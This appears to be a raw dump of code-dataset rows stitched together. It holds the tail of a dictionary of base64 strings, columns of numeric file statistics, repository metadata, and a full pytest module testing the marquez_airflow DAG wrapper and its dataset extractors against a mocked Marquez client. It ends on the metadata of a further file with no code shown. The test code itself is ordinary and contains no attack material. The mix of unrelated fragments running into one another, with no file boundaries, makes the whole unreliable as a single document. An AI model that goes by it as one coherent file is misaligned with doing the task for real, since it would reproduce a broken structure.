46: "mYAx7gOvE+c6mDJCz4ECc36qBPXEdf6U7e5nVwwXlJECZvCW8ksCocnaM7fAdEKkn71r3LWFVmVVKcsbQFbBWa0djSwOmGHd94rf9oqPw1obx5jBJGxbFbHpgg8flg0kAXJQsHgUgBJ3M/8bZ/wwps66jGao2/Ce0iJawlp5DxCAeRqT1zzheToOQHDjJugHHx5cPKcPxHUkjdGk9iNBPh32FUEouenO5DYfzCacMqVL37HyrR57vscNtzzycBSCW7Whi/kk0dvdbHySnbzj5G2h+iYCRbrRkqe1anA+wi5R3C9Y0A6ySWOFceLu4e85bATnQNn11EqrsWDvLa+gG3Jaa0VHj7Vcu8JK9OSv/LVnFljbkTtDsTTGiikaTIdsvIEbwF1ossBz3VEMJuSQuerV8FBAHRa6dAXlcNfy3YdIZUkmA5WbV4FTqrR4rE/oheETa2LJR7sMhnxui4ek2cOMFDoTx+O5VNwbZr83FFEvRrbk752+TP31p5J7M6nlbMvVZZFZOQW8x/RBmQEoGxTwHUz1Yzf6kGE4k/Eue6dzHtAWwfvaFLsz5d+53SsXYXM89BcyCx1WjDK397oC61kYOuv1IYxro4lRM+fp6A+NJbsLKucvApTPoxgTiGM2QuSHv9RjHyyB8lk9EBJ3FNJJOGnoGslDKvX+X38bLCrYE6VQKCONLWrZom2f7SBkIU8pTgrzUUU19W9/ZZuBS3rMjX0T7u5Xd8lx2Uxlf4iIjdR4o1ZVMPfd1CMtIaSiXV02IU1oQX+/iT7NRC/2V4sPcC8bwHNJ6HP09VL0iSa6xigvzzmYFhA1di84yTxBCMe6Q9hfdqeHIKXZeGUSgA",
47: "1Y8ZtGnTuBgvnrq6teKzoue7dGAbqkT7t3qt14yTZt3qBPIa0o+w5x3uihadQRFuY/Vt0+0OB/qU3ait7UVJgLuQDo32/+IUCbWC9a/WhLXe9Kh1w+zP0YxLJ6eoDz/WSAvQnHOOAEDCNPofWIHJcOFnAAFpNFxYfSp4F/73HBz58XOSTznz12EHpSY1j8JSClncdT2oq5/nBfM5iIvXl7QzpQcOjjO6DJJZYUt7idafT1QaW/myvPT1hDH+Kw1oCYBMAFxD0zCKlzCLO532/xFQqxcKpUJhwIjCpsbL4m07e2cD46VltNuiGgmBPwwZ7I+AGjTtn5GmEU1GW7fp4E/BWjaWVNFdeOElvPQ+Khb92HU2aAZEj5sQxvF285qbTtJ9Kvj9zKaNqV6WsjQpAtn6egfx0sLq7HuR/zuvIR/GnYxyru9b3HZ+fR3TE5ARCTa+BTXqo3s7LhHv7z/b2j2QqfJkUI97KhctlcPEPvuuCm5wY2G+BEoVc1KnGbJaJmdskWGq5Y6KRSugVhqifdVIZwL+IDGlVmjPLZKpIA0IGS6uZCkSaMPVC1JIo/FxS8s4JaAW9oiMKZjCn4EpymvC1dWzqc6EJfzTnITl8xGr+N/ITvWFQ7P95jMSSzKfBCqjmNk4ZjGkFGTmsyUnQ1w0IASo/XjBdQMeQ3NvBg3PQ97E5ZTxhZkSG+boF7UYqTyAPqoaqAdTDrfidJLuxJRw/krGWDPrTqPujLZKE9GraI+4FgnwaKh2Zp1hjKZjY4cVsvCttdQlTXl/Gdh9uicN7nKrzVxALBdOj4jI2Z7jJ5UtDO8racLRjargMaQuLHeQ9Zp3xYh5vxanIPozQA",
48: "5VtQgIkg8Xj6Pd+CWencaZIdAUlppyVtdEtrVdXZyQAnwtdIrnKWKpRTOMFTcB84AwUL53kXBKD+DDogIfKzOBaUxkqTRO/J7KmN4GIzru08DlwhCGawz2gE01YSKtW38zSPt2SFBIjfqON/cNhtyH3lFQ9AjG6Oa+Dfwtyx53+bYFSLRlegqLf6t3NkgP6IpyuJz276exjb9D5hHKe2EUUXn8YpPaO1NzyC3oLrgO0id1dkJZuL9sxZKLkqA4wo1zt8FG60tcL025FZ7RxfPJnXPskeoi3XiESqYOjxIubsc9JBzq+etI9ZNzUba7B0pD9ye7BVePN8PpYnaa+tieI3vbBsdFNK9bPVzM57cwQNWJ6fmg7A1YpRcGQloCsmN2IO0pxfsaehKxvXmgxCxgvJ+0YgDBlhn1enrhIkj+1ZvVKcu649vcjfQ9j4QspUgktXEsBphSPG8v3Tj5MCbeHkdN92KkHvWCRacKkbayKmv07mzz32OE/C9sxKRi0CWGS+5LpVDbG9lW6FsYlUzIYHURijhL7v3mBjzPS8rMV6iQSUqCUYY/seRk/XEdyxwKXL6UVhmK9LDNlCdu62yWlIuTlDnSWA9eHxpYMEtRXfR++Ai869pTLGfBjVu/fKBxx2FGgShYid3uwJavfBMwg8p4fX89mkcLyBsVHz+hlWgPBnnsaIrO2C1B4+rmIrXz4Ro7iSaHciy+qZoKKMj+xen80HI+uBpD9vZgR/0TbrKU5wXyWoXJWthHAnPcOzz9IpS2kJkVQjbulYjroVrcC6IFkEDJwZSCG8KQ/9rfl/b125+qlZio+zePPEQgCdJ6MPy86ksZ0ZvMFwAO3uQA",
49: "xiv710S9na2+l3z72W5Y+VRdgj22iIsMY0X6bCHVrIP/m+4RByZ58ABBUXdXxHaodqpiKA+Jdt6oIBpzcnGcVFERQ9xjROwFYD0+cM8NUlLVOCbYRET3yJsSpbxDkki/eroFzlV1iBKSQoyDpZeH+BvNLJUnChOuqlGO3r/f55iyj9pQruwIlz/jrDlQdKjTPtC3gZdbvuDbfLbX6mvs40utF+tTimNsLRdOAx220mtMBjMBB4WVO9dzJmQwsSsU0fo8qND/4jzRNbk2iobACtsl2amDF/ChJxt+usq2QJfdQGeYFXYjvkDfjPH4iOEXzoR2xqh47FCDuYIe8KZfpR26/azDR2zLL78fW2ASvFOc+rBsW5DH1cOucBolzoWbCuor0xULUw+tNcUGwySRUuq613cnFVKGQKbfokwZyUWlHE12txFBFqHYL8ngbhxycizSyS8R14ZFc3y2NMODFIw7CFtgdbzq2eaORjbgODwKLa72PLyOHpOnDruEcdldJmPai6W00GH84PFE/RvZ2UVJmGgZq7L8ogriDWui0vEfDBzo0rNamlNB5Qm5J29ZJxkHBj2AVrHvV5PyE2wy0RP2sYYMn8tsaq67fw/5VRmg1pd/ja/hN3AMGbgAano/ZTvW2kU4CopgTTF866nCwmWp29bRjp+EQbwD5Pm/4EqdsM2Bit6Ngxcxqc7PEfRAiG8J04YwYvTZK+AUKIZ2XyZh4wUcWme9NQKyjzYhMOT7bw+/drrdBKRWMYfZJuNrxh2Iql5ooaEnxrIbb99DasxqtWvl7bwhcocoBpYWm68oEO6v54WtBH3ipr8sBg9vwET1wzdxaVMnO+jef+MYQA",
50: "/mLm5VNOPbjseAJwp8M/rcSmEqkbYik7K4mnjOIZavLQxpPqcKLWGoHSleh/6KkwZZr1F85vMR7kI7LxB2VgygtGArBgEU+gDG5oHfap333u65MU4bAivXFNkLq/ai4SYqbwG6ZjyqDO/5d6Fd0+VkqOqzn3L2DvrRjerysXAkQfJiFVs+Y6GalxWnaydqJDR8C95y100O3Cm4wdjukCrTtSldsHSq7wmV8wusP+S6jHN+W8K50fq6XgVDVOR/q3+WDzqTn652tNUllx0Ypdt/UOzpC5q4Nk5baj74dLlhYjdyS4pHPH1QM50LuhfSQa6oXalBxS953K/lLeWmGKOsvC/c4XwOYD99wQtZ4FI1yALZazbJJP9Ux8BBig527nfnDXXBmVwN4iTLZYMwZ3hOhyrDNAopUNrSbx/Dc/cdpNHfYGnBx/X3cjk7/281JFMOaYV+YK//0hPcomFGU8IGTfdiNMi1+hMDywypw1vZ712I4zR3IIIrPAbeRFCYcTORMxMmAtQiiqlggAovWIPNQDJ/nB+CO6Vu2Oy/33z+DSaiG/6eHGqGKYhAtuIzzaTfZSt/BIWUavNJygxnONqx3zJVnX9iPXz3T0iAm5cxqRjCCx8yQvikgS8eVY+N6n5oFi7QAJYWPI/2MX1qGTJvlgY3RFP2G354FvfatFoEyMaHohhCXKyp2UoYW9pLbJt+MOvq5umSpvVZBYewbCtzAk4JxGEEdQtLRGqXG5VoxMKcA2QBzMNqZYDd4uCsxFCdbQ1OHn5gErAUEUh2c93loTS7Imu+HlCPCnzjpgvYXNUozcjS2G4nonR3yD9uGpysCrc6vSXSyoTSa6/iV+QA",
}
| 748.844828
| 862
| 0.958626
| 1,479
| 43,433
| 28.150778
| 0.962137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15582
| 0.005134
| 43,433
| 57
| 863
| 761.982456
| 0.80773
| 0.005871
| 0
| 0
| 0
| 0.961538
| 0.989044
| 0.989044
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d3c41618070da11cc2ea1deeb21f1008af4c8fbb
| 23,987
|
py
|
Python
|
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
integrations/airflow/tests/test_marquez_dag.py
|
mobuchowski/marquez
|
a1964623e13e95ee98b93517f11cdf116a1d1184
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import mock
import logging
from airflow.models import (TaskInstance, DagRun)
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.db import provide_session
from airflow.utils.dates import days_ago
from airflow.utils import timezone
from airflow.utils.state import State
from marquez_client.models import JobType, DatasetType
from marquez_airflow.dag import _EXTRACTORS as _DAG_EXTRACTORS
from marquez_airflow import DAG
from marquez_airflow.extractors import (
BaseExtractor, StepMetadata, Source, Dataset
)
from marquez_airflow.models import (
DbTableName,
DbTableSchema,
DbColumn
)
from marquez_airflow.utils import get_location, get_job_name
from uuid import UUID
log = logging.getLogger(__name__)
NO_INPUTS = []
NO_OUTPUTS = []
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
DAG_ID = 'test_dag'
DAG_RUN_ID = 'test_run_id_for_task_completed_and_failed'
DAG_RUN_ARGS = {'external_trigger': False}
# TODO: check with a different namespace and owner
DAG_NAMESPACE = 'default'
DAG_OWNER = 'anonymous'
DAG_DESCRIPTION = \
'A simple DAG to test the marquez.DAG metadata extraction flow.'
DAG_DEFAULT_ARGS = {
'owner': DAG_OWNER,
'depends_on_past': False,
'start_date': days_ago(1),
'email_on_failure': False,
'email_on_retry': False,
'email': ['owner@test.com']
}
TASK_ID_COMPLETED = 'test_task_completed'
TASK_ID_FAILED = 'test_task_failed'
@pytest.fixture
@provide_session
def clear_db_airflow_dags(session=None):
session.query(DagRun).delete()
session.query(TaskInstance).delete()
@provide_session
def test_new_run_id(clear_db_airflow_dags, session=None):
dag = DAG(
DAG_ID,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = dag.new_run_id()
assert UUID(run_id).version == 4
# tests a simple workflow with default extraction mechanism
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag(mock_get_or_create_marquez_client, mock_uuid,
clear_db_airflow_dags, session=None):
dag = DAG(
DAG_ID,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
# (1) Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
run_id_completed = "my-test_marquez_dag-uuid-completed"
run_id_failed = "my-test_marquez_dag-uuid-failed"
mock_uuid.side_effect = [run_id_completed, run_id_failed]
# (2) Add task that will be marked as completed
task_will_complete = DummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# (3) Add task that will be marked as failed
task_will_fail = DummyOperator(
task_id=TASK_ID_FAILED,
dag=dag
)
failed_task_location = get_location(task_will_complete.dag.fileloc)
# (4) Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id=DAG_RUN_ID,
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# Assert namespace meta call
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
# Assert source and dataset meta calls
mock_marquez_client.create_source.assert_not_called()
mock_marquez_client.create_dataset.assert_not_called()
# Assert job meta calls
create_job_calls = [
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=None,
output_dataset=None,
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
),
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_FAILED}",
job_type=JobType.BATCH,
location=failed_task_location,
input_dataset=None,
output_dataset=None,
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
)
]
log.info(
f"{ [name for name, args, kwargs in mock_marquez_client.mock_calls]}")
mock_marquez_client.create_job.assert_has_calls(create_job_calls)
# Assert job run meta calls
create_job_run_calls = [
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_COMPLETED}",
run_id=mock.ANY,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
),
mock.call(
job_name=f"{DAG_ID}.{TASK_ID_FAILED}",
run_id=mock.ANY,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
]
mock_marquez_client.create_job_run.assert_has_calls(create_job_run_calls)
# (5) Start task that will be marked as completed
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
# (6) Start task that will be marked as failed
ti1 = TaskInstance(task=task_will_fail, execution_date=DEFAULT_DATE)
ti1.state = State.FAILED
session.add(ti1)
session.commit()
dag.handle_callback(dagrun, success=True, session=session)
# Assert start run meta calls
start_job_run_calls = [
mock.call(run_id_completed, mock.ANY),
mock.call(run_id_failed, mock.ANY)
]
mock_marquez_client.mark_job_run_as_started.assert_has_calls(
start_job_run_calls
)
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id_completed,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
# Using a DummyOperator, no outputs exists, so assert that the create
# dataset call is not invoked.
mock_marquez_client.create_dataset.assert_not_called()
dag.handle_callback(dagrun, success=False, session=session)
mock_marquez_client.mark_job_run_as_failed.assert_called_once_with(
run_id=run_id_failed,
at=mock.ANY
)
# Assert an attempt to version the outputs of a task is not made when
# a task fails
mock_marquez_client.create_dataset.assert_not_called()
class TestFixtureDummyOperator(DummyOperator):
@apply_defaults
def __init__(self, *args, **kwargs):
super(TestFixtureDummyOperator, self).__init__(*args, **kwargs)
class TestFixtureDummyExtractor(BaseExtractor):
operator_class = TestFixtureDummyOperator
source = Source(
type="DummySource",
name="dummy_source_name",
connection_url="http://dummy/source/url")
def __init__(self, operator):
super().__init__(operator)
def extract(self) -> [StepMetadata]:
inputs = [
Dataset.from_table(self.source, "extract_input1")
]
outputs = [
Dataset.from_table(self.source, "extract_output1")
]
return [StepMetadata(
name=get_job_name(task=self.operator),
inputs=inputs,
outputs=outputs,
context={
"extract": "extract"
}
)]
def extract_on_complete(self, task_instance) -> [StepMetadata]:
return []
class TestFixtureDummyExtractorOnComplete(BaseExtractor):
operator_class = TestFixtureDummyOperator
source = Source(
type="DummySource",
name="dummy_source_name",
connection_url="http://dummy/source/url")
def __init__(self, operator):
super().__init__(operator)
def extract(self) -> [StepMetadata]:
return []
def extract_on_complete(self, task_instance) -> [StepMetadata]:
inputs = [
Dataset.from_table_schema(self.source, DbTableSchema(
schema_name='schema',
table_name=DbTableName('extract_on_complete_input1'),
columns=[DbColumn(
name='field1',
type='text',
description='',
ordinal_position=1
),
DbColumn(
name='field2',
type='text',
description='',
ordinal_position=2
)]
))
]
outputs = [
Dataset.from_table(self.source, "extract_on_complete_output1")
]
return [StepMetadata(
name=get_job_name(task=self.operator),
inputs=inputs,
outputs=outputs,
context={
"extract_on_complete": "extract_on_complete"
}
)]
# test the lifecycle including with extractors
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag_with_extractor(mock_get_or_create_marquez_client,
mock_uuid,
clear_db_airflow_dags,
session=None):
# --- test setup
dag_id = 'test_marquez_dag_with_extractor'
dag = DAG(
dag_id,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = "my-test-uuid"
mock_uuid.side_effect = [run_id]
# Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
# Add task that will be marked as completed
task_will_complete = TestFixtureDummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# Add the dummy extractor to the list for the task above
_DAG_EXTRACTORS[task_will_complete.__class__] = TestFixtureDummyExtractor
# --- pretend run the DAG
# Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id='test_marquez_dag_with_extractor_run_id',
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# --- Asserts that the job starting triggers metadata updates
# Namespace created
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
# Datasets are updated
mock_marquez_client.create_source.assert_called_with(
'dummy_source_name',
'DummySource',
'http://dummy/source/url'
)
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='extract_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='extract_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
)
])
# job is updated
mock_marquez_client.create_job.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default', 'name': 'extract_input1'}],
output_dataset=[{'namespace': 'default', 'name': 'extract_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
)
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract') == 'extract'
# run is created
mock_marquez_client.create_job_run.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
run_id=run_id,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
log.info("Marquez client calls when starting:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'create_job_run'
]
mock_marquez_client.reset_mock()
# --- Pretend complete the task
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
dag.handle_callback(dagrun, success=True, session=session)
# run is started
mock_marquez_client.mark_job_run_as_started.assert_called_once_with(
run_id, mock.ANY
)
# --- Assert that the right marquez calls are done
# job is updated before completion
mock_marquez_client.create_job.assert_has_calls([
mock.call(
namespace_name=DAG_NAMESPACE,
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[
{'namespace': 'default', 'name': 'extract_input1'}
],
output_dataset=[
{'namespace': 'default', 'name': 'extract_output1'}
],
context=mock.ANY,
description=DAG_DESCRIPTION,
run_id=run_id
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract') == 'extract'
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='extract_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='extract_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=run_id
)
])
log.info("Marquez client calls when completing:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'mark_job_run_as_started',
'mark_job_run_as_completed'
]
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag_with_extract_on_complete(
mock_get_or_create_marquez_client,
mock_uuid,
clear_db_airflow_dags,
session=None):
# --- test setup
dag_id = 'test_marquez_dag_with_extractor'
dag = DAG(
dag_id,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = "my-test-uuid"
mock_uuid.side_effect = [run_id]
# Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
# Add task that will be marked as completed
task_will_complete = TestFixtureDummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# Add the dummy extractor to the list for the task above
_DAG_EXTRACTORS[task_will_complete.__class__] = \
TestFixtureDummyExtractorOnComplete
# Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id='test_marquez_dag_with_extractor_run_id',
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# Namespace created
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
log.info("Marquez client calls when starting:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace'
]
mock_marquez_client.reset_mock()
# --- Pretend complete the task
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
dag.handle_callback(dagrun, success=True, session=session)
# Datasets are updated
mock_marquez_client.create_source.assert_called_with(
'dummy_source_name',
'DummySource',
'http://dummy/source/url'
)
# Datasets get called twice, once to reenact the _begin_run_flow
# and then again at _end_run_flow w/ the run id appended for
# the output dataset
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id='my-test-uuid'
)
])
# job is updated
mock_marquez_client.create_job.assert_has_calls([
mock.call(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}],
output_dataset=[{'namespace': 'default',
'name': 'extract_on_complete_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
),
mock.call(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}],
output_dataset=[{'namespace': 'default',
'name': 'extract_on_complete_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id='my-test-uuid'
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract_on_complete') == 'extract_on_complete'
# run is created
mock_marquez_client.create_job_run.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
run_id=run_id,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
# run is started
mock_marquez_client.mark_job_run_as_started.assert_called_once_with(
run_id, mock.ANY
)
# --- Assert that the right marquez calls are done
# job is updated before completion
mock_marquez_client.create_job.assert_has_calls([
mock.call(
namespace_name=DAG_NAMESPACE,
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[
{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}
],
output_dataset=[
{'namespace': 'default', 'name': 'extract_on_complete_output1'}
],
context=mock.ANY,
description=DAG_DESCRIPTION,
run_id=run_id
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract_on_complete') == 'extract_on_complete'
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=run_id
)
])
log.info("Marquez client calls when completing:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'create_job_run',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'mark_job_run_as_started',
'mark_job_run_as_completed'
]
| 32.903978
| 79
| 0.646058
| 2,837
| 23,987
| 5.095171
| 0.093761
| 0.059357
| 0.057627
| 0.039779
| 0.796057
| 0.773919
| 0.760567
| 0.746109
| 0.721965
| 0.709028
| 0
| 0.003593
| 0.269062
| 23,987
| 728
| 80
| 32.949176
| 0.820852
| 0.109643
| 0
| 0.715789
| 0
| 0
| 0.156787
| 0.072194
| 0
| 0
| 0
| 0.001374
| 0.064912
| 1
| 0.021053
| false
| 0
| 0.029825
| 0.003509
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
310461f740761fe3fece24641e0162474574c110
| 131
|
py
|
Python
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 1
|
2021-02-17T13:11:41.000Z
|
2021-02-17T13:11:41.000Z
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 9
|
2020-06-05T17:07:13.000Z
|
2022-01-13T00:36:30.000Z
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 1
|
2021-02-18T11:05:55.000Z
|
2021-02-18T11:05:55.000Z
|
from django.http import HttpResponse
def permission_denied_handler(request):
return HttpResponse("you have no permissions!")
| 21.833333
| 51
| 0.801527
| 16
| 131
| 6.4375
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129771
| 131
| 5
| 52
| 26.2
| 0.903509
| 0
| 0
| 0
| 0
| 0
| 0.183206
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
31266ef63be16cc1934d60293d6b49c4f1d7b820
| 196
|
py
|
Python
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
